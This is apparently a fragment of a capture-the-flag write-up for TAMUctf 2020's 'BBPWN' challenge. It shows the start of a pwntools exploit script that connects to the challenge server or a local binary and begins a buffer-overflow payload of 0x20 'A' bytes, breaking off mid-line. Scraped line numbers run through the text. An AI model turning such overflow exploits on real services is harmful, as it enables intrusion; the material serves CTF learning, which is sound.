TAMUctf 2020
PWN :: BBPWN 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 from pwn import * import argparse parser = argparse.ArgumentParser() parser.add_argument('-r', '--remote', help='connect to remote server', action='store_true') args = parser.parse_args() if args.remote : p = connect('challenges.tamuctf.com', 4252) else : p = process('./bbpwn') def exploit() : payload = b'A'*0x20 payload..